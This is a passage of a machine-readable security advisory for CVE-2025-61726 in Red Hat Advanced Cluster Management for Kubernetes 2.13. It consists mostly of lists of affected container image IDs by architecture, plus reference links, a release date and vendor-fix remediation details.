"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T02:15:09+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
